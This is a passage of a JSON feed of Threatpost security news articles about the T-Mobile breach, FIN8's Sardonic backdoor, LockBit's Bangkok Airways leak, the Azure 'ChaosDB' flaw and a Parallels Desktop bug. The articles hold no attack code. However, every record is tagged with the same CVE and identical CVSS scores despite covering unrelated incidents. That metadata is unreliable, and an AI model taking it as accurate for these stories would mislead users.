of failing to protect customer data.\n\nT-Mobile was [attacked](<https://www.engadget.com/t-mobile-data-breach-security-phone-number-hack-2020-172117333.html>) [twice](<https://www.complianceweek.com/cyber-security/t-mobile-data-breach-a-cautionary-tale-for-all-companies/28568.article>) last year, and in 2018, about 2.5 million customers had their data exposed in a network breach. That attack also became part of a federal class-action lawsuit.\n\nThe most recent theft involved the records of more than 13 million current customers, more than 40 million prospective customers who had applied for credit with the company, and 667,000 former customers, T-Mobile said last week. An additional 902,000 prepaid customers also had some data exposed.\n\nSome records contained Social Security numbers, phone numbers, names, security PINs, physical addresses, unique IMEI numbers, IMSI numbers, driver license numbers and dates of birth: in short, all the ingredients necessary for [identity theft](<https://threatpost.com/identity-theft-spikes-covid-19-relief/163577/>).\n\nA source familiar with the investigation told the WSJ that the Seattle office of the FBI is investigating.\n\n## The Latest From T-Mobile\n\nOn Friday, T-Mobile\u2019s CEO, Mike Sievert, announced that the company has sought help on the cybersecurity front. He said in a [statement](<https://www.t-mobile.com/news/network/cyberattack-against-tmobile-and-our-customers>) that the company has entered into long-term partnerships with Mandiant and with consulting firm KPMG LLP.\n\n\u201cWe know we need additional expertise to take our cybersecurity efforts to the next level \u2013 and we\u2019ve brought in the help,\u201d Sievert said. \u201cThese arrangements are part of a substantial multi-year investment to adopt best-in-class practices and transform our approach. This is all about assembling the firepower we need to improve our ability to fight back against criminals and building a future-forward strategy to protect T-Mobile and our customers.\u201d\n\nWith regards to details behind the attack, Sievert painted this as the work of an erudite threat actor. \u201cWhat we can share is that, in simplest terms, the bad actor leveraged their knowledge of technical systems, along with specialized tools and capabilities, to gain access to our testing environments and then used brute force attacks and other methods to make their way into other IT servers that included customer data,\u201d he was quoted as saying in Friday\u2019s statement.\n\nSecurity experts weren\u2019t too sure about T-Mobile\u2019s characterization of this as a fancy attack.\n\n## Well, Good Luck With All That\n\nSome security experts said that the move to pull in the security big guns is a good step, but T-Mobile\u2019s got a lot of gunk to scrape out, and it won\u2019t happen overnight. Ian McShane, Field CTO of security firm Arctic Wolf and former Gartner analyst, told Threatpost that, given how many breaches T-Mobile has suffered over the last few years, he\u2019s already skeptical about the company\u2019s claims that the breach was a \u201chighly sophisticated\u201d attack. \u201cI\u2019m sure many others in our industry will be just as keen as I am to understand the cause and the lessons learned, especially as it seems the internal investigation was only sparked by posts from a Twitter account with what appeared to be inside knowledge,\u201d he said.\n\nMark Manglicmot, vice president of security services at Arctic Wolf, told Threatpost that one of the poor practices brought to light by the breach is storing Social Security numbers in plain text. \u201cEncryption of this data is a mandatory part of the security equation,\u201d he pointed out.\n\nMoreover, since this is T-Mobile\u2019s sixth such breach in a few years, it\u2019s apparent \u201cthey haven\u2019t taken security seriously enough,\u201d Manglicmot continued. \u201cTheir IT asset management and patching of systems is poor. The combination of poor defenses and a lack of capable real-time detection and response is a recipe for this type of data theft disaster. Once a data rich company like T-Mobile experiences a breach, the flood-gates open to other attackers to find additional cracks. Reports are stating their security is a mess. It\u2019s a good step that they are bringing in reputable help to investigate and bolster defenses, but it\u2019s going to take T-Mobile years to fully get their security program on par with their responsibility to customers.\u201d\n\nThen too, there\u2019s that throbbing sore thumb: namely, the exposed router. Agio founder and CEO Bart McDonough pointed out to Threatpost that the unsecured router that Binns claimed to have exploited \u201cappears to have had a different configuration than other routers. The hacker exploited the weakness in this non-standard configuration.\u201d T-Mobile should have had an AI-based anomaly detection system in place, he said: one that might have caught the aberrant login and resulting data exfiltration, \u201callowing T-Mobile to perhaps minimize the damage from this attack.\u201d\n\nMany businesses aren\u2019t as complex as T-Mobile; nor do they get targeted with such intensity. Still, there are lessons to be learned for other businesses, McDonough observed. \u201cAll businesses could benefit from enhancing their cybersecurity fundamentals. Specifically, deploying device configuration management, access management, and AI-based detection of anomalous and suspicious network activity.\u201d\n\nAs it is, many, if not most, organizations only have a static awareness of their \u201csurface\u201d, e.g. internal systems exposed to the Internet, he continued. \u201cWhen an administrator makes a change (or mistake) the new exposure point should set off alarms and someone should be asking the question \u2018is that system, router, etc. presenting what we are intending?'\u201d\n\n_**Check out our free **_[_**upcoming live and on-demand webinar events**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-08-28T16:58:45", "type": "threatpost", "title": "T-Mobile\u2019s Security Is \u2018Awful,\u2019 Says Purported Thief", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33766"], "modified": "2021-08-28T16:58:45", "id": "THREATPOST:4CDF630111B3B270DE5293E66A69D0DE", "href": "https://threatpost.com/t-mobile-security-awful-thief/169011/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-08-30T18:55:50", "description": "The financially motivated FIN8 cybergang used a brand-new backdoor \u2013 dubbed Sardonic by the Bitdender researchers who first spotted it \u2013 in attempted (but unsuccessful) breaches of networks belonging to two unidentified U.S. financial organizations.\n\nIt\u2019s a nimble newcomer, researchers wrote: \u201cThe Sardonic backdoor is extremely potent and has a wide range of capabilities that help the threat actor leverage new malware on the fly without updating components,\u201d according to Bitdefender\u2019s report.\n\n[FIN8](<https://malpedia.caad.fkie.fraunhofer.de/actor/fin8>) has typically gone after financial services and payment-card data from [point-of-sale (PoS) systems](<https://threatpost.com/fin8-targets-card-data-fuel-pumps/151105/>), particularly those of retailers, restaurants and [the hotel industry](<https://www.bankinfosecurity.com/fin8-group-returns-targeting-pos-devices-new-tools-a-12819>). It\u2019s been active since at least [January 2016](<https://www2.fireeye.com/WBNR-Know-Your-Enemy-UNC622-Spear-Phishing.htmlhttps://www2.fireeye.com/WBNR-Know-Your-Enemy-UNC622-Spear-Phishing.html>), but it periodically pops in and out of dormancy in order to fine-tune tactics, techniques and procedures (TTPs) and thereby evade detection and ramp up its success rate.\n\n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nTrue to form, in March, Bitdefender spotted FIN8 re-emerging after a period of relative quiet with a [new version of the BadHatch backdoor](<https://threatpost.com/fin8-resurfaces-backdoor-malware/164684/>) to compromise companies in the chemical, insurance, retail and technology industries. Sardonic is an updated version of BadHatch that\u2019s apparently still under development, Bitdefender said.\n\nIt\u2019s a refinement of BadHatch in that it can be automatically boosted with new functionality without the malware needing to be redeployed: A way to make it more agile, Bitdefender said.\n\nBogdan Botezatu, director of threat research for Bitdefender, told [BankInfoSecurity](<https://www.bankinfosecurity.com/fin8-using-updated-backdoor-a-17381>) that the security firm has seen FIN8 carrying out two attacks over the past few months, what he called \u201cunusually high activity for a threat actor that used to take long breaks between attacks.\u201d\n\nBesides BadHatch \u2013 a backdoor that provides file transfer and reverse-shell functionality \u2013 FIN8\u2019s well-stocked [arsenal](<https://blog.gigamon.com/2019/07/23/abadbabe-8badf00d-discovering-badhatch-and-a-detailed-look-at-fin8s-tooling/>) has included [malware variants](<https://blog.gigamon.com/2019/07/23/abadbabe-8badf00d-discovering-badhatch-and-a-detailed-look-at-fin8s-tooling/>) such as ShellTea, a backdoor also known as [PunchBuggy](<https://www.fireeye.com/blog/threat-research/2016/05/windows-zero-day-payment-cards.html>), and the memory-scraper tool [PoSlurp/PunchTrack](<https://otx.alienvault.com/pulse/594821fe9cf28a6bee21691d/>). FIN8 has also used the TTPs of exploiting [Windows zero-days](<https://www.fireeye.com/blog/threat-research/2016/05/windows-zero-day-payment-cards.html>) and [spear-phishing](<https://unit42.paloaltonetworks.com/powersniff-malware-used-in-macro-based-attacks/>).\n\nBitdefender isn\u2019t sure what the initial infection vector was on the thwarted bank attack, but based on [FIN8\u2019s prior attacks](<https://www.bitdefender.com/files/News/CaseStudies/study/394/Bitdefender-PR-Whitepaper-BADHATCH-creat5237-en-EN.pdf>), it was likely via social engineering and spear-phishing campaigns.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/08/27123110/FIN8-attack-anatomy-e1630081924586.png>)\n\nFIN8 attack anatomy. Source: Bitdefender.\n\n## Sardonic Still Being Refined\n\nAnd now, there\u2019s Sardonic. Earlier this week, Bitdefender published a [deep dive](<https://businessinsights.bitdefender.com/deep-dive-into-a-fin8-attack-a-forensic-investigation>) describing a forensic investigation that led to the discovery of the new backdoor. Artifacts led researchers to conclude that the threat actors use that name to describe \u201can entire project including the backdoor itself, the loader and some additional scripts,\u201d according to Bitdefender.\n\nSardonic is apparently still under development, and Bitdefender suspects that the threat actors will be using additional updates still to come.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/08/27131258/evolution-of-badhatch-e1630084389237.jpeg>)\n\nThe evolution of BadHatch. Source: Bitdefender.\n\n## The Two Attacks\n\nDuring one of the attacks \u2013 a recent attack against an unidentified financial institution in the U.S. \u2013 FIN8 used a three-stage process to deploy and execute the Sardonic backdoor: A PowerShell script, a .NET loader and downloader shellcode.\n\nAfter it was loaded, Bitdefender said that the embedded dynamic link library obtained the value of the Y1US environment variable and extracted the string that contained options for behavior customization so it could make changes.\n\nBitdefender said that the new backdoor tried to evade security monitoring by using TLS encryption in order to conceal Powershell commands. After it gains network access, FIN8 has used the access to scan for victim networks, give attackers remote access, install a backdoor and deliver other malware payloads.\n\n## Fending Off Financial Malware\n\nBitdefender recommends that companies in the targeted verticals \u2013 retail, hospitality and finance \u2013 check for potential compromise by applying the indicators of compromise (IoCs) listed in its whitepaper ([PDF](<https://www.bitdefender.com/files/News/CaseStudies/study/394/Bitdefender-PR-Whitepaper-BADHATCH-creat5237-en-EN.pdf>)), and implementing endpoint detection and response (EDR), extended detection and response (XDR) and other security defenses.\n\nBitdefender offered these protective measures:\n\n * Separate the PoS network from the ones used by employees or guests\n * Introduce cybersecurity awareness training for employees to help them spot phishing e-mails.\n * Tune your e-mail security solution to automatically discard malicious or suspicious attachments.\n * Integrate threat intelligence into existing SIEM or security controls for relevant indicators of compromise.\n\n_**Check out our free **_[_**upcoming live and on-demand webinar events**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-08-27T17:32:56", "type": "threatpost", "title": "FIN8 Targets US Bank With New \u2018Sardonic\u2019 Backdoor", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33766"], "modified": "2021-08-27T17:32:56", "id": "THREATPOST:7421D8BA8C82C24562A6FF9F690B1DCE", "href": "https://threatpost.com/fin8-bank-sardonic-backdoor/168982/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-08-30T19:58:43", "description": "The LockBit ransomware gang has apparently struck again, having purportedly stolen 103GB worth of files from Bangkok Airways and promising to release them tomorrow, on Tuesday.\n\nA Dark Web intelligence firm calling itself DarkTracer (apparently a separate intel firm than the better-known DarkTrace) tweeted a screen capture of a countdown clock from LockBit 2.0 that, as of Friday, showed four and a half days left. \u201cLockBit ransomware gang has announced Bangkok Airways on the victim list,\u201d DarkTracer [tweeted](<https://twitter.com/darktracer_int/status/1430494830560309249>). \u201cIt announced that 103GB of compressed files will be released.\u201d\n\n> [ALERT] LockBit ransomware gang has announced Bangkok Airways on the victim list. It announced that 103GB of compressed files will be released. [pic.twitter.com/LT2C0Eixxn](<https://t.co/LT2C0Eixxn>)\n> \n> \u2014 DarkTracer : DarkWeb Criminal Intelligence (@darktracer_int) [August 25, 2021](<https://twitter.com/darktracer_int/status/1430494830560309249?ref_src=twsrc%5Etfw>)\n\nA day earlier, on Thursday, Bangkok Airways publicly [acknowledged](<https://www.bangkokair.com/press-release/view/clarifies-the-incident-of-a-cybersecurity-attack>) that it had been blasted with a cyberattack a week ago, on Monday, Aug. 23. It\u2019s still investigating the incident \u201cas a matter of urgency,\u201d the company said in a press release, and is working on beefing up its defenses.\n\n> \u201cUpon such discovery, the company immediately took action to investigate and contain the event, with the assistance of a cybersecurity team. Currently, the company is investigating, as a matter of urgency, to verify the compromised data and the affected passengers as well as taking relevant measures to strengthen its IT system.\u201d \u2014Bangkok Airways press release\n\n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nSo far, it looks like affected personal data belonging to passengers include:\n\n * Passenger name\n * Family name\n * Nationality\n * Gender\n * Phone number\n * Email address\n * Other contact information\n * Passport information\n * Historical travel information\n * Partial credit-card information\n * Special meal information\n\nThe attackers evidently didn\u2019t manage to access Bangkok Airway\u2019s operational or aeronautical security systems, the company said. The company apologized, saying that \u201cBangkok Airways Public Company Limited takes the protection of passenger\u2019s data very seriously and the airline is deeply sorry for the worry and inconvenience that this malicious incident has caused.\u201d\n\nThe airline said that it has notified the proper authorities, including the Royal Thai police.\n\n## LockBit 2.0\n\nLockBit 2.0 is similar to its ransomware-as-a-service (RaaS) brethren DarkSide and REvil: Like those other operations. LockBit uses an affiliate model to rent out its ransomware platform, taking a cut of any ransom payments that result.\n\nThe gang went on a hiring spree in the wake of [DarkSide](<https://threatpost.com/darksides-servers-shutdown/166187/>) and [REvil](<https://threatpost.com/whats-next-revil-victims/167926/>) both shutting down operations, putting up wallpaper on compromised systems that includes text [inviting insiders to help](<https://threatpost.com/lockbit-ransomware-proliferates-globally/168746/>) compromise systems and promising payouts of millions of dollars.\n\nEarlier this month, [LockBit attacked Accenture](<https://threatpost.com/accenture-lockbit-ransomware-attack/168594/>), a global business consulting firm with an insider track on some of the world\u2019s biggest, most powerful companies.\n\nAt the time, Cyble researchers suggested in a [Tweet stream](<https://twitter.com/AuCyble/status/1425422006690881541>) that the Accenture attack could have been an insider job. \u201cWe know #LockBit #threatactor has been hiring corporate employees to gain access to their targets\u2019 networks,\u201d they tweeted, along with a clock counting down how much time was left for Accenture to cough up the ransom.\n\nAccording to [a report](<https://www.trendmicro.com/en_us/research/21/h/lockbit-resurfaces-with-version-2-0-ransomware-detections-in-chi.html>) released two weeks ago by Trend Micro, attacks in July and August have employed LockBit 2.0 ransomware that feature a [souped-up encryption method](<https://threatpost.com/lockbit-ransomware-proliferates-globally/168746/>).\n\nThreatpost has reached out to DarkTracer for more details and an update, and has reached out to DarkTrace to find out more about its near-namesake. We also reached out to Bangkok Airways for more details, including whether a ransom has been demanded, whether the company has figured out how many customers were affected by the breach and whether it plans to offer identity-theft protection.\n\n## Watch Out for Phishing Attempts\n\nBangkok Airways recommends that passengers contact their bank or credit-card provider and change any compromised passwords ASAP. Also, it recommended that passengers keep their eyes out for suspicious or unsolicited calls and/or emails \u2013 particularly phishing attempts claiming to be coming from Bangkok Airways that attempt to gather personal data.\n\nBangkok Airways won\u2019t be contacting customers to ask for payment-card details or the like, it said. If passengers experience such phishing attempts, Bangkok Airways said that they should report it to law enforcement and to the airline, at:\n\n * Toll-free number 1-800-010-171 (within Thailand) between 8 a.m. and 5:30 p.m. (Thai local time)\n * Toll number 800-8100-6688 (Overseas) during between 8 a.m. and 5:30 pm (Thai local time)\n * Email: infosecurity@bangkokair.com\n\n## Step Numero Uno: IDing Point of Entry\n\nQuentin Rhoads-Herrera, director of professional services at managed detection and response (MDR) services provider CRITICALSTART, observed that Bangkok Airways has a tall order ahead of it when it comes to notifying affected customers in several different countries. Just one complication is the fact that it entails different regulatory bodies overseeing various regulations \u2013 the General Data Protection Regulation [(GDPR) rules](<https://threatpost.com/data-leak-gdpr-advice-site/155199/>), for example.\n\n\u201cThe primary thing Bangkok Air needs to do is identify the point of entry used by LockBit,\u201d Rhoads-Herrera observed to Threatpost on Monday. \u201cIf LockBit group was able to gain entry due to an unpatched externally facing system, then not only do they need to evaluate their current external exposure, but they also need to improve their overall asset inventory and patch management processes to ensure systems are updated often. Understanding the way the criminals initially gained entry is pivotal to ensuring this doesn\u2019t occur in the future.\u201d\n\nHe stressed that Bangkok Air also needs to understand everything LockBit did once on the inside to ensure that it hardens its defenses and alerts on similar future activities. \u201cWith enough determination, any criminal can breach a company,\u201d Rhoads-Herrera commented via email. \u201cThis is why it is very important that organizations work to lowering their time to detect and respond as much as possible to limit the damage of such a breach.\u201d\n\nBHe also noted that \u2013 assuming that this was a ransomware strike \u2013 the fact that it\u2019s coupled with a threat to disclose data makes it a [double extortion](<https://threatpost.com/double-extortion-ransomware-attacks-spike/154818/>) attack, in which the injury of paralyzed systems is compounded by the misery of threatened information disclosure.\n\nAll the more reason to test backup infrastructure, he noted: \u201cIt\u2019s very important that organizations not only protect their backup infrastructure so they can recover after a breach but also protect their most important data and alert on large data leaving their infrastructure. In this instance, the data LockBit has obtained can be used to extort Bangkok Airways for additional crypto currency or they can release it as a way to damage the brand of Bangkok Airways at the same time of receiving notoriety as a criminal organization.\u201d\n\n083021 15:41 UPDATE: Added input from Quentin Rhoads-Herrera.\n\n_**Check out our free **_[_**upcoming live and on-demand webinar events**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-08-30T15:14:21", "type": "threatpost", "title": "LockBit Gang to Publish 103GB of Bangkok Airways Customer Data", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33766"], "modified": "2021-08-30T15:14:21", "id": "THREATPOST:6382C221240C9EDF8BE17227B3E1A57A", "href": "https://threatpost.com/lockbit-bangkok-airways-breach/169019/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-08-30T18:54:19", "description": "A critical security vulnerability in Microsoft\u2019s Azure cloud database platform \u2013 Cosmos DB \u2013 could have allowed full remote takeover of accounts, with admin rights to read, write and delete any information to a database instance.\n\nAccording to researchers at Wiz, any Azure customer could access another customer\u2019s account, without authentication. The bug, dubbed #ChaosDB, could be trivially exploited, and \u201cimpacts thousands of organizations, including numerous Fortune 500 companies,\u201d according to researchers.\n\nMicrosoft disabled the buggy component after being alerted to it by Wiz and notified more than 30 percent of Cosmos DB customers about the issue, but \u201cwe believe the actual number of customers affected by #ChaosDB is higher,\u201d according to a [Wiz writeup](<https://chaosdb.wiz.io/>), published on Thursday.\n\n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nThe firm added that any prior exploitation is unknown, and that \u201cthe vulnerability has been exploitable for months and every Cosmos DB customer should assume they\u2019ve been exposed.\u201d\n\nIncidentally, the issue has no CVE because [cloud bugs](<https://threatpost.com/azure-functions-privilege-escalation/165307/>) aren\u2019t designated within that system, researchers added.\n\n## **Scant Bug Details for #ChaosDB**\n\nThe issue exists in the Jupyter Notebook feature of Cosmos DB, according to the analysis. Jupyter Notebook is an open-source web application that allows users to create and share documents that contain live code, equations, visualizations and narrative text.\n\n\u201cAzure Cosmos DB built-in Jupyter Notebooks are directly integrated into the Azure portal and your Azure Cosmos DB accounts, making them convenient and easy to use,\u201d according to Microsoft\u2019s [documentation](<https://docs.microsoft.com/en-us/azure/cosmos-db/cosmosdb-jupyter-notebooks>). \u201cDevelopers, data scientists, engineers and analysts can use the familiar Jupyter Notebooks experience to do data exploration, data cleaning, data transformations, numerical simulations, statistical modeling, data visualization and machine learning.\u201d\n\nHowever, Wiz researchers found that by querying information about a target Cosmos DB Jupyter Notebook, it\u2019s possible to snag credentials for not just the Jupyter Notebook compute instance and the Jupyter Notebook Storage account of another user, but also the Cosmos DB account itself including the account\u2019s primary read-write key used to encrypt it.\n\n\u201cUsing these credentials, it is possible to view, modify and delete data in the target Cosmos DB account via multiple channels,\u201d according to Wiz.\n\nThe company isn\u2019t providing further technical details beyond the fact that #ChaosDB is actually made up of a string of vulnerabilities that can be chained together; but it did provide an attack diagram:\n\n\n\nIt also released a video demonstrating a proof-of-concept exploit:\n\n## **How to Protect Against #ChaosDB Cyberattacks**\n\nTo mitigate the risk, Microsoft has advised customers to regenerate the Cosmos DB primary keys \u201cout of an abundance of caution.\u201d The steps for doing so [can be found here](<https://docs.microsoft.com/en-us/azure/cosmos-db/secure-access-to-data?tabs=using-primary-key#primary-keys>).\n\nThe computing giant also noted that Azure Cosmos DB accounts with a vNET or that are firewall-enabled are protected by additional security mechanisms that prevent risk of unauthorized access.\n\nWiz researchers, who earned a $40,000 bug bounty for finding the issue, added that all users should review all past activity in their Cosmos DB accounts.\n\nNo in-the-wild exploitation has been noticed as of yet.\n\n\u201cWe have no indication that external entities outside the researcher had access to the primary read-write key associated with your Azure Cosmos DB account(s),\u201d Microsoft said. \u201cIn addition, we are not aware of any data access because of this vulnerability.\u201d\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-08-27T16:49:23", "type": "threatpost", "title": "Critical Azure Cosmos DB Bug Allows Full Cloud Account Takeover", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33766"], "modified": "2021-08-27T16:49:23", "id": "THREATPOST:538043C9083F275CEDC19CDCF8E4BC02", "href": "https://threatpost.com/azure-cosmos-db-bug-cloud/168986/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-08-30T18:59:28", "description": "The makers of Parallels Desktop has released a workaround fix for a high-severity privilege escalation bug that impacts its Parallels Desktop 16 for Mac software and all older versions. Mitigation advice comes five months after researchers first identified the bug in April.\n\nParallels Desktop, now owned by private equity giant KKR, is used by seven million users, according to the company, and allows Mac users to run Windows, Linux and other operating systems on their macOS.\n\nThe vulnerability allows malicious software running in a Parallels virtual machine (VM) to access macOS files shared in a default configuration of the software. The software maker stated that the recommended fixes need to be manually performed by end users and will likely \u201cinconvenience\u201d some while also reducing product functionality.\n\n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nIn a [Wednesday security bulletin](<https://exchange.xforce.ibmcloud.com/vulnerabilities/208188>), first to widely disclose details of the bug, it was revealed that the vulnerability (CVE-2021-34864) is caused by improper access control in the Parallels\u2019 WinAppHelper component. The flaw, according to Parallels, is specifically tied to the software\u2019s [Parallels Tools](<https://www.parallels.com/blogs/parallels-tools/>), a proxy for communications between the host macOS and the virtual machine\u2019s operating system.\n\n## An Easy-to-Exploit Bug\n\n\u201cThe issue results from the lack of proper access control. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of the hypervisor,\u201d according to a separate security [advisory, also posted Wednesday](<https://www.zerodayinitiative.com/advisories/ZDI-21-1000/>).\n\nThe severity of the vulnerability is rated as high (8.8) using the Common Vulnerability Scoring System, version 3.0. The bulletin also warns that the level of complexity needed to exploit the vulnerability is \u201clow.\u201d\n\n\u201cBy default, Parallels Desktop shares files and folders between the Mac and a VM, so users can easily open macOS files from applications running in a virtual machine and save documents to Mac,\u201d Parallels explained. \u201cThis functionality exposes the user home folder to the VM. This folder may contain configuration files, cache from different applications, etc., that malicious software can access.\u201d\n\nParallels is advising users to mitigate the vulnerability via reconfiguring their software or upgrading to the latest version, which is Parallels Desktop 17 for Mac, released on August 10.\n\n\u201cParallels Desktop 17 for Mac and newer versions are not affected. The entire home folder is no longer shared with a VM by default, only selected folders, like Desktop, Documents, Downloads, etc.,\u201d according to the [vulnerability\u2019s summary description](<https://vulmon.com/vulnerabilitydetails?qid=CVE-2021-34864>).\n\nThe company added, \u201cThis vulnerability allows local malicious users to escalate privileges on affected installations of Parallels Desktop. An attacker must first obtain the ability to execute low-privileged code on the target guest system in order to exploit this vulnerability.\u201d\n\n## **Disclosure Timeline **\n\nThe flaw was initially detected by security researchers Sunjoo Park and Jack Dates on April 8, during Trend Micro\u2019s Pawn2Own Austin event. For their efforts, the researchers earned $40,000 each, according to the event\u2019s organizer.\n\nOn August 10, Parallels posted to its Knowledge Base information regarding the flaw, under the title \u201cMitigate ZDI-CAN-13543 in Parallels Desktop 16 and older\u201d. The post described the April discovery and mitigation steps users needed to take to protect themselves. On Wednesday, a number of security alerts posted the vulnerability\u2019s identifying number (CVE-2021-34864), assigning it a high-severity rating.\n\nThe prospect of malicious software or a threat actor breaking or escaping a virtual instance of Windows to infect a system is a worst-case scenario. Parallels did not return requests for comment for this report.\n\n## **Parallels: An Inconvenient Fix**\n\nTo mitigate against the vulnerability, Parallels Desktop 16 for Mac users (and other legacy users) have a number of options. The first option is to upgrade to Parallels Desktop 17 for Mac, which does not contain the flaw. It\u2019s unclear if affected customers will have to pay the $50 one-time upgrade fee for the Standard Edition to mitigate the flaw via an upgrade.\n\nFor customers running Parallels Desktop 16 users or earlier versions of the software, the company said the fixes available to them will \u201creduce functionality\u201d of the software and cause \u201cinconveniences,\u201d such as file duplications when sharing documents across VM and the host macOS.\n\n\u201cIf you don\u2019t plan to run untrusted code in the VM, it is recommended to follow common security practices,\u201d the company recommended. \u201cIf you run untrusted code in the VM and you want to isolate the VM from Mac, then one of the following options can be used.\u201d\n\nThose options, according Parallels, include:\n\n 1. _ Disable shared folders as described in [KB 6912](<https://kb.parallels.com/6912#section4>). Shared Profile functionality will be disabled as well, and you will no longer be able to open Mac files in the VM or save files to Mac. Learn more in [KB 6912](<https://kb.parallels.com/6912>)._\n 2. _ Alternatively, isolate the VM from Mac as described in [KB 112942](<https://kb.parallels.com/112942>). After isolating, folders, files, applications, and external drives are not shared between two operating systems. In general, it becomes impossible for a VM to access any information on your Mac. Isolating a virtual machine provides the highest level of security._\n\nWhile the above mitigates security issue, it also eliminates one of [Parallels selling points](<https://www.parallels.com/products/desktop/>): \u201cSeamlessly move and share content between Mac and Windows.\u201d\n\nIt\u2019s also unclear whether macOS users who configure their systems to isolate the VM guest from the host operating system mitigate the flaw.\n\n## **Researchers Turn to Parallels **\n\nWhile Parallels Desktop for Mac is not marketed as a cybersecurity research tool, a [number of websites recommend this type of use scenario](<https://www.sentinelone.com/blog/how-to-reverse-macos-malware-part-one/>).\n\nParallels is just one of many virtual machine options for macOS users to run alternate operating systems. Others include Apple\u2019s own Boot Camp feature, VirtualBox and VMWare for macOS.\n\nIncreased interest in Parallels has recently been 